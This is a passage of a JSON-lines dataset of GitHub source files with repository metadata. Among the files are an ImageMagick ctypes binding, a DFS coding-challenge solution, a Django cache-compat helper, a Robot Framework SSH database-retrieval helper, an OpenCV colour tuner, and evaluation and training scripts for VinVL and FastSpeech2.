('fill', PixelPacket),\n ('stroke', PixelPacket),\n ('stroke_width', ctypes.c_double),\n ('gradient', GradientInfo),\n ('fill_pattern', Image),\n ('tile', Image),\n ('stroke_pattern', Image),\n ('stroke_antialias', ctypes.c_int),\n ('text_antialias', ctypes.c_int),\n ('fill_fule', ctypes.c_int),\n ('linecap', ctypes.c_int),\n ('linejoin', ctypes.c_int),\n ('miterlimit', ctypes.c_ulong),\n ('dash_offset', ctypes.c_double),\n ('decorate', ctypes.c_int),\n ('compose', ctypes.c_int),\n ('text', ctypes.c_char_p),\n ('face', ctypes.c_ulong),\n ('font', ctypes.c_char_p),\n ('metrics', ctypes.c_char_p),\n ('family', ctypes.c_char_p),\n ('style', ctypes.c_int),\n ('stretch', ctypes.c_int),\n ('weight', ctypes.c_ulong),\n ('encoding', ctypes.c_char_p),\n ('pointsize', ctypes.c_double),\n ('density', ctypes.c_char_p),\n ('align', ctypes.c_int),\n ('undercolor', PixelPacket),\n ('border_color', PixelPacket),\n ('server_name', ctypes.c_char_p),\n ('dash_pattern', ctypes.c_double),\n ('clip_mask', ctypes.c_char_p),\n ('bounds', SegmentInfo),\n ('clip_units', ctypes.c_int),\n ('opacity', ctypes.c_short),\n ('render', ctypes.c_int),\n ('element_reference', ElementReference),\n ('debug', ctypes.c_int),\n ('signature', ctypes.c_ulong),\n ]\n\nDrawInfo = wrap_ptr_class(_DrawInfo, lib.AcquireDrawInfo, lib.DestroyDrawInfo)\n","repo_name":"tailhook/magickpy","sub_path":"magickpy/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"38375758552","text":"import sys\nsys.setrecursionlimit(10**6)\n\n### DFS 구현\ndef solution(grid):\n def dfs(i,j):\n if i<0 or j<0 or i>=n or j>=m or grid[i][j] != 1:\n return\n grid[i][j] = 0\n dfs(i, j+1)\n dfs(i, j-1)\n dfs(i+1, j)\n dfs(i-1, j)\n\n count = 0\n for i in range(n):\n for j in range(m):\n if grid[i][j] == 1:\n dfs(i, j)\n count += 1\n return count\n\n# 문제풀이 시작\nt = int(input())\n\n# 배추밭 2차원배열 생성\nfor _ in range(t):\n m, n, k = map(int, sys.stdin.readline().split())\n grid = [[0 for col in range(m)] for row in range(n)]\n for _ in range(k):\n y, x = map(int,sys.stdin.readline().split())\n grid[x][y] = 1\n\n print(solution(grid))","repo_name":"bong7233/BOJ","sub_path":"백준/Silver/1012. 유기농 배추/유기농 배추.py","file_name":"유기농 배추.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16796180522","text":"\"\"\"Compatibility functions for older Django cache backend configuration.\n\nThese functions are used to maintain compatibility or transition settings from\nolder versions of Django.\n\"\"\"\n\nimport logging\n\nfrom django.core.cache import DEFAULT_CACHE_ALIAS, InvalidCacheBackendError\n\ntry:\n from django.core.cache import parse_backend_uri\nexcept ImportError:\n from djblets.util.compat.django.core.cache import parse_backend_uri\n\n\nlogger = logging.getLogger(__name__)\n\n\nBACKEND_CLASSES = {\n 'db': 'db.DatabaseCache',\n 'dummy': 'dummy.DummyCache',\n 'file': 'filebased.FileBasedCache',\n 'locmem': 'locmem.LocMemCache',\n 'memcached': 'memcached.PyMemcacheCache',\n}\n\nRENAMED_BACKENDS = {\n 'django.core.cache.backends.memcached.CacheClass':\n 'django.core.cache.backends.memcached.PyMemcacheCache',\n 'django.core.cache.backends.memcached.MemcachedCache':\n 'django.core.cache.backends.memcached.PyMemcacheCache',\n}\n\n\ndef normalize_cache_backend(cache_backend, cache_name=DEFAULT_CACHE_ALIAS):\n \"\"\"Return a new-style ``CACHES`` dictionary from any given cache_backend.\n\n Over time, Django has had support for two formats for a cache backend. The\n old-style :django:setting:`CACHE_BACKEND` string, and the new-style\n :django:setting:`CACHES` dictionary.\n\n This function will accept either as input and return a dictionary\n containing a single normalized entry for the given cache backend. This can\n be merged into the existing :django:setting:`CACHES` setting.\n\n If a :django:setting:`CACHES` dictionary is passed, the \"default\" cache\n will be the result.\n\n Args:\n cache_backend (dict or str):\n The new-style or old-style cache backend dictionary or str to\n normalize.\n\n cache_name (str):\n The name of the cache backend to look up in ``cache_backend``, if\n a new-style dictionary is provided.\n\n Returns:\n A new-style cache backend dictionary containing the single cache\n backend referenced. If there were any parsing issues, an empty\n dictionary will be returned.\n \"\"\"\n if not cache_backend:\n return {}\n\n if isinstance(cache_backend, dict):\n backend_info = cache_backend.get(cache_name, {})\n backend_name = backend_info.get('BACKEND')\n\n if backend_name in RENAMED_BACKENDS:\n backend_info['BACKEND'] = RENAMED_BACKENDS[backend_name]\n\n return backend_info\n\n try:\n engine, host, params = parse_backend_uri(cache_backend)\n except InvalidCacheBackendError as e:\n logger.error('Invalid cache backend (%s) found while loading '\n 'siteconfig: %s',\n cache_backend, e)\n return {}\n\n if engine in BACKEND_CLASSES:\n engine = 'django.core.cache.backends.%s' % BACKEND_CLASSES[engine]\n else:\n engine = '%s.CacheClass' % engine\n\n defaults = {\n 'BACKEND': engine,\n 'LOCATION': host,\n }\n defaults.update(params)\n\n return defaults\n","repo_name":"djblets/djblets","sub_path":"djblets/cache/backend_compat.py","file_name":"backend_compat.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":314,"dataset":"github-code","pt":"34"} +{"seq_id":"42068383418","text":"import os\nimport os.path\nfrom ..const import CONTEXT_FILE_NAME\nfrom ..config import Config\n\n\ndef new_context(\n config: Config,\n name: str,\n image: str,\n base: str,\n):\n path = os.getcwd()\n\n # create directory\n current_dir = os.path.basename(path)\n if current_dir != name and name is not None:\n path = os.path.join(path, name.lower())\n os.mkdir(path)\n print('Created context folder', path)\n\n context = {}\n\n # image name\n if image is not None:\n print('Image:', image)\n context['image'] = image\n\n # base image name\n if base is not None:\n print('Base image:', base)\n context['base'] = base\n \n context = Config(data={\n \"version\": 1,\n \"cowait\": context\n }, parent=config)\n\n context_file = os.path.join(path, CONTEXT_FILE_NAME)\n if os.path.isfile(context_file):\n print('Error: Context file', context_file, 'already exists')\n return\n\n context.write(context_file)\n print('Created new context definition', context_file)\n","repo_name":"backtick-se/cowait","sub_path":"cowait/cli/commands/new_context.py","file_name":"new_context.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"34"} +{"seq_id":"14107622358","text":"import random\nimport my_module\n\nprint(my_module.pi)\n\nrandom_int = random.randint(1, 10)\nprint(random_int)\n\n# 0.00 - 0.9999\nrandom_float = random.random()\nprint(random_float)\n\n# for a number between 0 and 5\nrandom_float * 5 # 0.00 - 4.99999\n\nlove_score = random.randint(1, 100)\nprint(f\"your love score is {love_score}\")\n\n# import modules\n# learn random module functions for integers and floats","repo_name":"timcrisp94/100-days-of-python","sub_path":"1-20/day_4/notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"69873956257","text":"import random\n\n# Choice names\nr = \"Rock\"\np = \"Paper\"\nsc = \"Scissors\"\nsp = \"Spock\"\nl = \"Lizard\"\n\n# Who beats whom\nbeat_table = {\n r : [ l, sc ],\n p : [ sp, r ],\n sc : [ p, l ],\n sp : [ r, sc ],\n l : [ p, sp ] \n}\n\n# How do they beat each other?\nbeat_name = {\n sc+p : \"Scissors cut Paper!\",\n p+r : \"Paper covers Rock!\",\n r+l : \"Rock crushes Lizard!\",\n l+sp : \"Lizard poisons Spock!\",\n sp+sc: \"Spock smashes Scissors!\",\n sc+l : \"Scissors decapitates Lizard!\",\n l+p : \"Lizard etas Paper!\",\n p+sp : \"Paper disproves Spock!\",\n sp+r : \"Spock vaporizes Rock!\",\n r+sc : \"Rock crushes Scissors!\"\n}\n\nfull_names = [ r, p, sc, sp, l ]\nshort_names = [ \"R\", \"P\", \"Sc\", \"Sp\", \"L\" ]\n\nshort_to_full = {\n \"R\" : r,\n \"P\" : p,\n \"Sc\": sc,\n \"Sp\": sp,\n \"L\": l\n}\n\nwhile True:\n print(\"Choose your hero!\")\n print(\"(R)ock, (P)aper, (Sc)issors, (Sp)ock, (L)izard\")\n\n player_choice = input()\n\n if player_choice not in full_names:\n if player_choice in short_names:\n player_choice = short_to_full[player_choice]\n else:\n print(\"Oh no! Seems like you misspelled something. Try again!\")\n continue\n\n computer_choice = random.choice(full_names)\n\n print(\"Computer randomly chose {}!\".format(computer_choice))\n\n if computer_choice in beat_table[player_choice]:\n print(beat_name[player_choice+computer_choice])\n print(\"You won! Let's play more? (Y)es/(N)o\")\n elif player_choice in beat_table[computer_choice]:\n print(beat_name[computer_choice+player_choice])\n print(\"You lost! Wanna take a revenge? (Y)es/(N)o\")\n else:\n print(\"Seems like it's a draw. Want to try once again? (Y)es/(N)o\")\n\n go_on = input()\n\n if(go_on == \"Y\" or go_on == \"Yes\"):\n print(\"That's noice! Let's play!\")\n elif(go_on == \"N\" or go_on == \"No\"):\n print(\"That's a shame you don't want to play... Cause I do!\")\n exit()\n else:\n print(\"I didn't quite get what you've said, but I guess you want to play more!\")","repo_name":"deniskamazur/techrace","sub_path":"RPSSL/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"15708102459","text":"import os\nimport glob\nimport ntpath\nimport shutil\nimport sqlite3\nimport paramiko\nfrom robot.api import logger\nfrom _WebServiceCore import _WebServiceCore\n\n\nclass _Database_Keywords(_WebServiceCore):\n _target_db = None\n _db_path = None\n\n def _set_db_path(self, db):\n # logger.info(db)\n assert os.path.exists('./artifacts/{0}'.format(db)), AssertionError('Unable to find database')\n self._db_path = './artifacts/{0}'.format(db)\n\n def _extract_db_files(self, ip_address='', offline=False):\n\n if not offline:\n # Extract default DB from the ECU\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n try:\n ssh.connect(hostname=ip_address,\n port=9003,\n username='root')\n sftp = ssh.open_sftp()\n\n if not os.path.exists('./artifacts'):\n os.makedirs('./artifacts')\n\n stdin, stdout, stderr = ssh.exec_command('find /firmware/webservice/data -name *.sqlite')\n filelist = stdout.read().splitlines()\n\n for _file in filelist:\n sftp.get(_file, './artifacts/{0}'.format(ntpath.basename(_file)))\n\n sftp.close()\n ssh.close()\n\n logger.info('Databases successfully retrieved')\n\n except paramiko.SSHException:\n logger.info('Unable to retrieve databases')\n\n else:\n files = [y for x in os.walk(str(offline)) for y in glob.glob(os.path.join(x[0], '*.sqlite'))]\n for i in files:\n shutil.copyfile(i, './artifacts/{0}'.format(os.path.basename(i)))\n\n def _get_all_table_records(self, table, identifier='*'):\n _cmd = 'select {0} from {1} {2}'.format(identifier, table, 'desc' if identifier != '*' else '')\n\n if self._db_path:\n self._target_db = sqlite3.connect(self._db_path)\n\n cur = self._target_db.cursor()\n cur.execute(_cmd)\n to_return = cur.fetchall()\n self._target_db.close()\n\n return to_return\n else:\n return list()\n","repo_name":"qijia00/RobotFramework_AcceptanceTestDrivenDevelopment_Python","sub_path":"src/WebServiceLibrary/keywords/_database_keywords.py","file_name":"_database_keywords.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28855100858","text":"import cv2\nimport numpy as np\nimport time\n\n\ndef callback(object):\n pass\n\n\ncv2.namedWindow('mask_yellow', cv2.WINDOW_AUTOSIZE)\ncv2.namedWindow('mask_green', cv2.WINDOW_AUTOSIZE)\ncv2.namedWindow('mask_red', cv2.WINDOW_AUTOSIZE)\ncv2.createTrackbar('red1_H', 'mask_red',0,10,callback)#red1\ncv2.createTrackbar('red2_H', 'mask_red',156,180,callback)#red1\ncv2.createTrackbar('red_S','mask_red',43,255,callback)\ncv2.createTrackbar('red_V','mask_red',200,255,callback)\n\ncv2.createTrackbar('green_H', 'mask_green',35,77,callback)#red1\ncv2.createTrackbar('green_S', 'mask_green',43,255,callback)\ncv2.createTrackbar('green_V', 'mask_green',200,255,callback)\n\ncv2.createTrackbar('yellow_H', 'mask_yellow',11,43,callback)#red1\ncv2.createTrackbar('yellow_S', 'mask_yellow',43,255,callback)\ncv2.createTrackbar('yellow_V', 'mask_yellow',200,255,callback)\n\ncapture = cv2.VideoCapture(1)\ncapture.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncapture.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\ngreen_low = np.array([40, 103, 164])\ngreen_up = np.array([77, 255, 255])\n\nred0_low = np.array([5, 166, 224])\nred1_low = np.array([160, 166,224])\n\nred0_up = np.array([10, 255, 255])\nred1_up = np.array([180, 255, 255])\n\nlower_yellow = np.array([15, 130, 190]) # 黄色低阈值\nupper_yellow = np.array([34, 255, 255]) # 黄色高阈值\n\ndef color_rec(dst):\n color=0\n hsv = cv2.cvtColor(dst, cv2.COLOR_BGR2HSV)\n\n mask_green = cv2.inRange(hsv, green_low, green_up)\n mask_yellow = cv2.inRange(hsv, lower_yellow, upper_yellow)\n red_mask1 = cv2.inRange(hsv, red0_low, red0_up)\n red_mask2 = cv2.inRange(hsv, red1_low, red1_up)\n mask_red = cv2.bitwise_or(red_mask1, red_mask2)\n\n contours, hierarchy = cv2.findContours(mask_green, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n contours1, hierarchy2 = cv2.findContours(mask_red, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n contours2, hierarchy3 = cv2.findContours(mask_yellow, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n if len(contours):\n (x, y, w, h) = cv2.boundingRect(contours[0])\n\n else:\n w=0\n h=0\n\n if len(contours1):\n (x1, y1, w1, h1) = cv2.boundingRect(contours1[0])\n else:\n w1=0\n h1=0\n\n if len(contours2):\n (x2, y2, w2, h2) = cv2.boundingRect(contours2[0])\n else:\n w2=0\n h2=0\n\n s1=w*h\n s2=w1*h1\n s3=w2*h2\n if s1>=30:\n print(\"green\")\n color=1 #green\n elif s2>=30:\n print('red')\n color=2 #red\n elif s3>=30:\n print('yellow')\n color=3 #yelow\n cv2.imshow(\"mask_red\", mask_red)\n cv2.imshow(\"mask_yellow\", mask_yellow)\n cv2.imshow(\"mask_green\", mask_green)\n return color\n\nwhile True:\n ret, frame = capture.read()\n t1=time.time()\n H1 = cv2.getTrackbarPos('red1_H', 'mask_red')\n H2 = cv2.getTrackbarPos('red2_H', 'mask_red')\n S = cv2.getTrackbarPos('red_S', 'mask_red')\n V = cv2.getTrackbarPos('red_V', 'mask_red')\n g_H = cv2.getTrackbarPos('green_H', 'mask_green')\n g_S = cv2.getTrackbarPos('green_S', 'mask_green')\n g_V = cv2.getTrackbarPos('green_V', 'mask_green')\n y_H = cv2.getTrackbarPos('yellow_H', 'mask_yellow')\n y_S = cv2.getTrackbarPos('yellow_S', 'mask_yellow')\n y_V = cv2.getTrackbarPos('yellow_V', 'mask_yellow')\n #red0_low=np.array([H1,S,V])\n #red1_low=np.array([H2,S,V])\n #green_low=np.array([g_H,g_S,g_V])\n #lower_yellow=np.array([y_H,y_S,y_V])\n color_rec(frame)\n t2 = time.time() - t1\n #print(t2)\n if cv2.waitKey(10) == 27:\n break\ncv2.destroyAllWindows()","repo_name":"mengxiwenmxw/smallcar-15","sub_path":"颜色阈值调节.py","file_name":"颜色阈值调节.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71903236578","text":"import matplotlib.pyplot as plt\r\nimport csv\r\nfrom sklearn.cluster import KMeans\r\nimport time\r\n\r\nstart_time = time.time()\r\n\r\ntravel_rate = 20000/60\r\ntime_start = 0\r\ntime_end = 60*24*7\r\nmax_delivery_time = 60*4\r\n\r\n# import data from .csv file\r\ncsv_file = 'finalProject.csv'\r\nf = open(csv_file, 'r')\r\nreader = csv.reader(f)\r\nnext(reader)\r\ndata = [[float(i[j]) for j in range(len(i))] for i in reader]\r\n\r\n'''\r\n# compute a position by weight\r\n\r\nx_sum = 0 \r\ny_sum = 0\r\n\r\nfor obj in data:\r\n\tx_sum += (obj[1] + obj[3])\r\n\ty_sum += (obj[2] + obj[4])\r\nx_avg = x_sum / len(data)\r\ny_avg = y_sum / len(data)\r\np_avg = data[200][1:3]\r\n\r\n# print value\r\nprint(x_avg, y_avg)\r\n'''\r\n# compute the value\r\ndef dist(p1, p2):\r\n\treturn abs(p1[0] - p2[0]) + abs(p1[1] - p2[1])\r\n\r\ndef val(d1, d2):\r\n\treturn 1.2 ** (-1 * (1 + 0.001*(d1 + 0.5 * d2)))\r\n#\r\n'''\r\nt_time = []\r\nfor obj in data:\r\n\tt_time.append(dist(obj[1:3], obj[3:5]) / travel_rate)\r\n\r\n\r\nprint(sum(t_time) / len(t_time))\r\n\r\nplt.hist(t_time)\r\nplt.show()\r\n'''\r\n'''\r\nv = 0\r\nfor obj in data:\r\n\tprint(obj[1:3])\r\n\tv += val( dist(p_avg, obj[1:3]), dist(p_avg, obj[3:5]) )\r\nprint(v)\r\n\r\n'''\r\n'''\r\n# sort\r\nt = sorted(data, key=lambda item : item[0])\r\nwith open('ProjectSorted.csv', 'w', newline='') as fp:\r\n a = csv.writer(fp)\r\n a.writerows(t)\r\n\r\nfor obj in data:\r\n\tplt.plot(obj[1], obj[2], 'ro')\r\nplt.show()\r\n\r\n\r\n#\r\n'''\r\n\r\n\r\n#\r\nx = [i for i in range(2000)]\r\ny = [1.2 ** ( -1 * (1 + 0.01 * i)) for i in x]\r\nplt.plot(x, y)\r\nplt.show()","repo_name":"jshen28/IE511_Project","sub_path":"try1.py","file_name":"try1.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16877813946","text":"# https://www.techiedelight.com/coin-change-problem-find-total-number-ways-get-denomination-coins/\nimport sys\nimport numpy as np\n\n\ndef get_user_input():\n user_input_list = input(\"Please enter a list of integers separated by a comma. No spaces.\\n\").split(\", \")\n user_int_list = []\n\n for element in user_input_list:\n if element.isdigit():\n int_element = int(element)\n user_int_list.append(int_element)\n else:\n print(\"Sorry, one or many values that you entered are not integers. Please try again\")\n sys.exit()\n\n user_int_list.sort()\n return user_int_list\n\n\ndef generate_max_fits_list(target, lst):\n max_fits_list = []\n for index1 in range(0, len(lst)):\n temp_fit_lst = []\n max_fit = int(target/lst[index1])\n for index2 in range(0, max_fit + 1):\n temp_fit_lst.append(index2)\n max_fits_list.append(temp_fit_lst)\n return max_fits_list\n\n\ndef max_fit_combinations(arrays, out=None):\n # https://stackoverflows.co/questions/1208118/using-numpy-to-build-an-array-of-all-combinations-of-two-arrays\n arrays = [np.asarray(x) for x in arrays]\n dtype = arrays[0].dtype\n\n n = np.prod([x.size for x in arrays])\n if out is None:\n out = np.zeros([n, len(arrays)], dtype=dtype)\n\n # m = n / arrays[0].size\n m = int(n / arrays[0].size)\n out[:, 0] = np.repeat(arrays[0], m)\n if arrays[1:]:\n max_fit_combinations(arrays[1:], out=out[0:m, 1:])\n for j in range(1, arrays[0].size):\n # for j in xrange(1, arrays[0].size):\n out[j * m:(j + 1) * m, 1:] = out[0:m, 1:]\n # for i in range(0, len(out[j * m:(j + 1) * m])):\n # print(f\"this is out[long] {out[j * m:(j + 1) * m][i]}\")\n return out\n\n\ndef find_all_fit_ways(target, user_lst, fit_lst):\n target_fit_arr = np.array([], dtype='int32')\n arr = np.array(user_lst)\n arr.reshape((len(arr), 1))\n fit_arr = np.array(fit_lst)\n\n for i in range(0, len(fit_arr)):\n temp_sum = int(np.matmul(fit_arr[i], arr))\n if temp_sum == target:\n target_fit_arr = np.append(target_fit_arr, fit_arr[i])\n\n rows = int(len(target_fit_arr)/len(user_lst))\n cols = len(user_lst)\n target_fit_arr = target_fit_arr.reshape((rows, cols))\n return target_fit_arr\n\n\ndef find_coin_ways(fit_arr, user_lst):\n final_coin_lst = []\n fit_lst = fit_arr.tolist()\n for index in range(0, len(fit_lst)):\n temp_lst = []\n for count in range(0, len(user_lst)):\n if len(temp_lst) == 0:\n temp_lst = [user_lst[count]] * fit_lst[index][count]\n else:\n temp_lst = temp_lst + [user_lst[count]] * fit_lst[index][count]\n final_coin_lst.append(temp_lst)\n\n return final_coin_lst\n\n\nuser_target = int(input(\"Please insert a target sum.\\n\"))\nuser_input_lst = get_user_input()\nmax_fits = generate_max_fits_list(user_target, user_input_lst)\nall_max_fit_combinations = max_fit_combinations(max_fits)\nfit_array = find_all_fit_ways(user_target, user_input_lst, all_max_fit_combinations)\nresult = find_coin_ways(fit_array, user_input_lst)\nprint(f\"The total number of ways is {len(result)}.\\n{result}\")\n","repo_name":"SabrinaDu7/daily-exercises","sub_path":"day2.3.2.py","file_name":"day2.3.2.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26181351021","text":"#!/usr/bin/env python\n\nimport os, sys \n\nfrom setuptools import find_packages \nfrom platform import python_version\n_packages = find_packages() \n\nimport numpy \nfrom os.path import join, dirname\n# from setuptools import setup\n\nfrom distutils.core import setup \nfrom setuptools.extension import Extension \n\nver = sys.version_info\n\n\ninclude_dirs=[ '/usr/include/databox', numpy.get_include()]\n \n# if ver.major == 3 :\n# if ver.minor == 7: \n# include_dirs.append( \"/usr/include/python3.7m\" ) \n# elif ver.minor == 6:\n# include_dirs.append( \"/usr/include/python3.6m\" ) \n\next_modules = [\n Extension(\n '_gjsonc',\n sources=[ \n \"./gjsonc_wrap.cxx\"\n ],\n libraries=[ ],\n# extra_link_args=[ 'libcrypto.a', 'libssl.a' ], \n extra_compile_args=[\n \"-std=c++11\",\n \"-fPIC\", '-g0', '-O3', \n \"-D__RELEASE__\", \n# \"-DSWIGRUNTIME_DEBUG\",\n \"-D__NOLOGGER__\" ], # '-Wall', \"-fPIC\", \"-std=c++11\", '-g0', '-O3', '-Wno-cpp', \n \n include_dirs= include_dirs\n ) \n] \n\nsetup (name='gjsonc',\n version='1.0',\n author=\"SWIG Docs\",\n description=\"\"\"Simple gjsonc from docs\"\"\",\n ext_modules=ext_modules,\n py_modules=[\"gjsonc\"],\n packages=_packages \n)\n","repo_name":"pkuazi/AISample","sub_path":"utils/geojsons/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42014914291","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nsys.path.insert(0, '.')\nimport argparse\nfrom tqdm import tqdm\n\n# paddle\nimport paddle\nimport paddle.nn as nn\nimport paddle.nn.functional as F\nfrom paddle.io import DataLoader\nfrom paddlenlp.transformers.bert.tokenizer import BertTokenizer\n\n# model\nfrom models.bert import BertConfig\nfrom models.oscar import OscarForVLTaks\n# dataset\nfrom datasets.retrieval_dataset import RetrievalDataset\n# config\nfrom config.default import get_cfg_defaults\n# utils\nfrom utils.utils import compute_ranks\n\n\ndef main(args, cfg):\n # 1. Create test dataloader\n tokenizer = BertTokenizer.from_pretrained(cfg['INPUT']['BERT_MODEL'])\n test_dataset = RetrievalDataset(split=cfg['DATASET']['TEST'],\n cfg=cfg,\n tokenizer=tokenizer,\n training=False)\n test_dataloader = DataLoader(dataset=test_dataset,\n shuffle=False,\n batch_size=cfg['OPTIMIZATION']['BATCH_SIZE'],\n num_workers=cfg['MISC']['NUM_WORKERS'],\n drop_last=False)\n\n # 2. Build model\n config = BertConfig.from_json_file(os.path.join(args.checkpoint_dir, 'config.json'))\n config.num_labels = cfg['OUTPUT']['NUM_LABELS']\n config.loss_type = cfg['OPTIMIZATION']['LOSS_TYPE']\n config.img_feat_dim = cfg['INPUT']['IMG_FEATURE_DIM']\n config.img_feat_type = cfg['INPUT']['IMG_FEATURE_TYPE']\n model = OscarForVLTaks(config=config)\n checkpoint = paddle.load(os.path.join(args.checkpoint_dir, 'paddle_model.bin'))\n model.set_state_dict(checkpoint['model'])\n print('Load state dict from %s.' % args.checkpoint_dir)\n model.eval()\n\n # 3. Start to inference\n inference_file = os.path.join(args.checkpoint_dir, 'inference_results.pd')\n if os.path.isfile(inference_file):\n print('Found inference file in {}, skip inference.'.format(inference_file))\n results = paddle.load(inference_file)\n else:\n print('Found no inference file in {}, start to inference'.format(args.checkpoint_dir))\n results = {}\n for inds, batch in tqdm(test_dataloader):\n with paddle.no_grad():\n inputs = {\n 'input_ids': batch[0],\n 'attention_mask': batch[1],\n 'token_type_ids': batch[2],\n 'img_feats': batch[3],\n 'labels': batch[4],\n }\n _, logits = model(**inputs)[:2]\n probs = F.softmax(logits, axis=1)\n # The confidence to be a matched pair\n result = probs[:, 1]\n inds = [inds[i].item() for i in range(inds.shape[0])]\n result = [result[i].item() for i in range(result.shape[0])]\n results.update({ind: res for ind, res in zip(inds, result)})\n print('Inference Done! Saving inference results to {}.'.format(inference_file))\n paddle.save(results, inference_file)\n\n # 4. Start to evaluate\n i2t_ranks, t2i_ranks = compute_ranks(test_dataset, results)\n rank = [1, 5, 10]\n i2t_accs = [sum([_ < r for _ in i2t_ranks]) / len(i2t_ranks) for r in rank]\n print(\"I2T Retrieval: {:.4f} @ R1, {:.4f} @ R5, {:.4f} @ R10\".format(\n i2t_accs[0], i2t_accs[1], i2t_accs[2]))\n t2i_accs = [sum([_ < r for _ in t2i_ranks]) / len(t2i_ranks) for r in rank]\n print(\"T2I Retrieval: {:.4f} @ R1, {:.4f} @ R5, {:.4f} @ R10\".format(\n t2i_accs[0], t2i_accs[1], t2i_accs[2]))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--cfg_file', type=str, required=True,\n help='Path to the config file for a specific experiment.')\n args = parser.parse_args()\n\n # Get the default config & merge from cfg_file\n cfg = get_cfg_defaults()\n cfg.merge_from_file(args.cfg_file)\n\n # Make sure checkpoint dir exists\n args.checkpoint_dir = cfg['EVAL']['CHECKPOINT_DIR']\n assert os.path.isdir(args.checkpoint_dir), \\\n \"Please make sure the specified checkpoint dir and eval epoch exist.\"\n\n # Call main\n main(args, cfg)","repo_name":"cattidea/VinVL-Paddle","sub_path":"tools/eval_retrieval.py","file_name":"eval_retrieval.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"5207886397","text":"'''\nExample case 2. In this example 2 as 20 is greater than 10.\nExample case 3. In this example 3 as 10 is equal to 10.\n\n'''\n\ndef relationshipCheck(a,b):\n\tif a>b:\n\t\treturn '>'\n\telif a NamedTuple(\n 'train_outputs',\n [\n ('data_ref_paths', List)\n ]):\n import re\n import json\n import os\n from pathlib import Path\n from typing import Tuple\n\n import torch\n import torch.multiprocessing\n import torch.nn as nn\n from fastspeech2.dataset import Dataset\n from fastspeech2.trainers.trainer import Trainer\n from fastspeech2.utils import parse_kwargs, get_rest_path_from\n from pytorch_sound.models import build_model\n from torch.utils.data import DataLoader\n\n \n from fs2_env import get_paths\n paths = get_paths(base_path=data_base_path, current_data_path=current_data_path)\n\n\n def main(train_path: str, preprocessed_paths: List,\n save_dir: str, save_prefix: str,\n model_name: str, pretrained_path: str = None, num_workers: int = 16,\n batch_size: int = 16,\n pitch_feature: str = 'phoneme', energy_feature: str = 'phoneme',\n pitch_min: float = 0., energy_min: float = 0.,\n lr: float = 2e-4, weight_decay: float = 0.0001, betas=(0.9, 0.98),\n train_epoch: int = 0, group_size: int = 4,\n number_of_model_save_per_epoch: int = 0, log_interval: int = 50, grad_clip: float = 0.0, grad_norm: float = 5.0,\n milestones: Tuple[int] = None, gamma: float = 0.2, sr: int = 22050, seed: int = 2021,\n is_reference: bool = False):\n # create model\n model = build_model(model_name).cuda()\n\n # multi-gpu\n if torch.cuda.device_count() > 1:\n model = nn.DataParallel(model)\n\n # create optimizers\n optimizer = torch.optim.AdamW(model.parameters(), lr=lr, betas=betas, weight_decay=weight_decay)\n if milestones:\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones, gamma=gamma)\n else:\n scheduler = None\n\n # save_dir = current_data_path / save_dir\n\n dataset = Dataset(train_path, preprocessed_paths, pitch_min=pitch_min, energy_min=energy_min,\n text_cleaners=['english_cleaners'],\n batch_size=batch_size, sort=True, drop_last=True, is_reference=is_reference)\n\n print(f'INFO: length of data: {len(dataset)}')\n train_max_step = len(dataset) * train_epoch\n save_interval = len(dataset) // number_of_model_save_per_epoch\n\n train_loader = DataLoader(\n dataset,\n batch_size=batch_size * group_size,\n shuffle=True,\n collate_fn=dataset.collate_fn,\n num_workers=num_workers\n )\n\n # train\n Trainer(\n model, optimizer,\n train_loader, None,\n max_step=train_max_step, save_interval=save_interval,\n log_interval=log_interval, pitch_feature=pitch_feature, energy_feature=energy_feature,\n save_dir=save_dir, save_prefix=save_prefix, grad_clip=grad_clip, grad_norm=grad_norm,\n pretrained_path=pretrained_path, sr=sr,\n scheduler=scheduler, seed=seed, is_reference=is_reference\n ).run()\n\n\n config = {\n \"fs2_base_path\": \"fs2-data\",\n \"train_path\": \"train.txt\",\n \"eval_path\": \"val.txt\",\n \"preprocessed_path\": \"preprocessed\",\n # \"save_dir\": \"./saved-models\",\n \"save_prefix\": \"fastspeech2_base\",\n \"model_name\": \"fast_speech2_vctk\",\n\n \"log_interval\": 100,\n \"pitch_min\": -1.9287127187455897,\n 